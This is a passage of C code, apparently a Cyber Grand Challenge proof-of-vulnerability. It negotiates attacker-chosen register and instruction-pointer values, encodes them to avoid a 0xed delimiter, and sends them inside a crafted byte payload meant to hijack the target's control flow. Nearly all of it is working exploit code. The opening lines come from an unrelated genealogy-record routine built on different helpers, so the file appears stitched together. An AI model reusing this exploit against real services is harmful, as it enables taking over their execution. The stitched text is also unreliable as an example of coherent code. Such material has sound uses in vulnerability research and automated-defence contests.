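    if (exchange(rec_03, sizeof rec_03 - 1) != 0) return -1;
    if (exchange(rec_04, sizeof rec_04 - 1) != 0) return -1;

    // writing data (parent2)
    patch_word(rec_parent2, 2, p2_val);
    if (exchange(rec_parent2, sizeof rec_parent2 - 1) != 0) return -1;
    if (exchange(rec_06, sizeof rec_06 - 1) != 0) return -1;
    if (exchange(rec_07, sizeof rec_07 - 1) != 0) return -1;

    // writing data (parent3)
    patch_word(rec_parent3, 2, p3_val);
    if (exchange(rec_parent3, sizeof rec_parent3 - 1) != 0) return -1;
    if (exchange(rec_09, sizeof rec_09 - 1) != 0) return -1;
    if (exchange(rec_10, sizeof rec_10 - 1) != 0) return -1;
    if (exchange(rec_11, sizeof rec_11 - 1) != 0) return -1;

    // writing data union parent1, parent2
    patch_word(union_p1_p2, 3, p2_val);
    if (exchange(union_p1_p2, sizeof union_p1_p2 - 1) != 0) return -1;

    // writing data adopted child child, parent1, parent2
    patch_word(adopt_p1_p2, 4, p2_val);
    if (exchange(adopt_p1_p2, sizeof adopt_p1_p2 - 1) != 0) return -1;

    // writing data separated parent1, parent2
    patch_word(sep_p1_p2, 3, p2_val);
    if (exchange(sep_p1_p2, sizeof sep_p1_p2 - 1) != 0) return -1;

    // writing data union parent2, parent3
    patch_word(union_p2_p3, 2, p2_val);
    patch_word(union_p2_p3, 3, p3_val);
    if (exchange(union_p2_p3, sizeof union_p2_p3 - 1) != 0) return -1;

    // writing data separated parent2, parent3
    patch_word(sep_p2_p3, 2, p2_val);
    patch_word(sep_p2_p3, 3, p3_val);
    if (exchange(sep_p2_p3, sizeof sep_p2_p3 - 1) != 0) return -1;

    // writing data adopted child child, p_unk, parent2
    patch_word(adopt_unk_p2, 4, p2_val);
    if (exchange(adopt_unk_p2, sizeof adopt_unk_p2 - 1) != 0) return -1;

    return 0;
}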
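/*
 * Send len bytes of data to the target on fd 1.
 *
 * The bytes are staged through append_buf() as in the generated code, and
 * nothing is transmitted when the staged buffer is empty or missing.
 */
static void pov_send(unsigned char *data, unsigned int len)
{
    unsigned char *staged = NULL;
    unsigned int staged_len = 0;

    staged = append_buf(staged, &staged_len, data, len);
    if (staged != NULL && staged_len > 0) {
        transmit_all(1, staged, staged_len);
    }
    free(staged);
}

/*
 * Read len bytes from the target on fd 0 and discard them.
 *
 * When expect is non-NULL the reply is also passed to data_match() against
 * expect_len bytes of expect; as in the generated code, the match count is
 * not acted on.
 *
 * Returns 0 on success, -1 if the reply buffer could not be allocated.
 */
static int pov_read(unsigned int len, unsigned char *expect,
                    unsigned int expect_len)
{
    /* calloc so a short read never exposes indeterminate bytes to data_match */
    unsigned char *reply = calloc(len, 1);

    if (reply == NULL) {
        return -1;
    }

    /* The read status was ignored by the generated code; kept that way. */
    (void)length_read(0, reply, len);

    if (expect != NULL) {
        (void)data_match(reply, len, expect, expect_len);
    }

    free(reply);
    return 0;
}

/*
 * Replays a fixed, machine-generated message exchange with the target:
 * writes go to fd 1, reads come from fd 0, and the two values obtained from
 * type1_negotiate() are spliced into the first message.
 *
 * Returns 0 after the exchange, 1 if a reply buffer cannot be allocated.
 */
int main(void)
{
    /* Each array is sent without its implicit trailing NUL (sizeof - 1). */
    static unsigned char tag_first[] = "\xad\xdd\xad\xdd";
    static unsigned char ascii_digits[] = /* ASCII "81963890" */
        "\x38\x31\x39\x36\x33\x38\x39\x30";
    static unsigned char body[] =
        "\x8c\xdc\x00\x00\x14\xae\x07\x41\x47\x71\x56\x59\x4e\x4e\x43\x54"
        "\x64\x46\x54\x6f\x4a\x67\x62\x6e\x4b\x56\x73\x4e\x72\x4a\x54\x72"
        "\x42\x45\x44\x65\x50\x57\x7a\x53\x4b\x6a\x51\x51\x68\x75\x53\x6f"
        "\x74\x75\x71\x49\x4a\x70\x63\x67\x52\x49\x76\x74\x4a\x70\x49\x4d"
        "\x4c\x4b\x62\x71\x44\x79\x76\x6a\x4f\x53\x41\x47\x66\x75\x46\x6c"
        "\x4f\x41\x51\x66\x54\x4d\x64\x4e\x4d\x7a\x52\x56\x43\x48\x78\x64"
        "\x4a\x43\x5a\x53\x4a\x52\x52\x61\x4c\x63\x7a\x43\x41\x69\x6c\x66"
        "\x4f\x76\x64\x62\x6e\x4b\x6e\x48\x77\x6a\x51\x43\x7a\x6c\x4a\x61"
        "\x66\x4f\x47\x68\x6a\x5a\x5a\x41";
    static unsigned char filler[] = "\x43\x43\x43\x43";
    static unsigned char end_byte[] = "\xed";
    static unsigned char tag_second[] = "\xc4\xec\x4e\xee";
    static unsigned char all_ones[] = "\xff\xff\xff\xff";
    static unsigned char expected_reply[] =
        "\x47\x71\x56\x59\x4e\x4e\x43\x54\x64\x46\x54\x6f\x4a\x67\x62\x6e"
        "\x4b\x56\x73\x4e\x72\x4a\x54\x72\x42\x45\x44\x65\x50\x57\x7a\x53"
        "\x4b\x6a\x51\x51\x68\x75\x53\x6f\x74\x75\x71\x49\x4a\x70\x63\x67"
        "\x52\x49\x76\x74\x4a\x70\x49\x4d\x4c\x4b\x62\x71\x44\x79\x76\x6a"
        "\x4f\x53\x41\x47\x66\x75\x46\x6c\x4f\x41\x51\x66\x54\x4d\x64\x4e"
        "\x4d\x7a\x52\x56\x43\x48\x78\x64\x4a\x43\x5a\x53\x4a\x52\x52\x61"
        "\x4c\x63\x7a\x43\x41\x69\x6c\x66\x4f\x76\x64\x62\x6e\x4b\x6e\x48"
        "\x77\x6a\x51\x43\x7a\x6c\x4a\x61\x66\x4f\x47\x68\x6a\x5a\x5a\x41"
        "\x4d\x4d\x4d\x4d\x43\x43\x43\x43\x45\x45\x45\x45\xed";

    type1_vals t1vals;

    /* Original note: can use either EAX(0) or EDI(7); 7 is requested here. */
    type1_negotiate(0xedededed, 0xedededed, 7, &t1vals);

    /*
     * No byte of the two negotiated values may equal 0xed. OR-ing 0x12 into
     * every byte sets bits 1 and 4, which are both clear in 0xed, so no byte
     * of the result can be 0xed.
     * NOTE(review): 0xed is also the single byte sent after these values, so
     * it presumably acts as the target's input delimiter; confirm against the
     * challenge source.
     */
    const unsigned int no_ed = 0x12121212;
    unsigned int reg = t1vals.regval | no_ed;
    unsigned int eip = t1vals.ipval | no_ed;

    /* First message: tag, digits, body, then the two negotiated values. */
    pov_send(tag_first, sizeof tag_first - 1);
    pov_send(ascii_digits, sizeof ascii_digits - 1);
    pov_send(body, sizeof body - 1);
    pov_send((unsigned char *)&reg, sizeof reg);
    pov_send(filler, sizeof filler - 1);
    pov_send((unsigned char *)&eip, sizeof eip);
    pov_send(end_byte, sizeof end_byte - 1);

    if (pov_read(2, NULL, 0) != 0) {
        return 1;
    }

    /* Second message: a different tag followed by the same digits. */
    pov_send(tag_second, sizeof tag_second - 1);
    pov_send(ascii_digits, sizeof ascii_digits - 1);

    if (pov_read(4, NULL, 0) != 0) {
        return 1;
    }
    if (pov_read(4, NULL, 0) != 0) {
        return 1;
    }
    /* 141-byte reply, compared with the recorded reply but not enforced. */
    if (pov_read(sizeof expected_reply - 1, expected_reply,
                 sizeof expected_reply - 1) != 0) {
        return 1;
    }
    if (pov_read(2, NULL, 0) != 0) {
        return 1;
    }

    /* Final message, followed by one last 2-byte reply. */
    pov_send(all_ones, sizeof all_ones - 1);

    if (pov_read(2, NULL, 0) != 0) {
        return 1;
    }

    return 0;
}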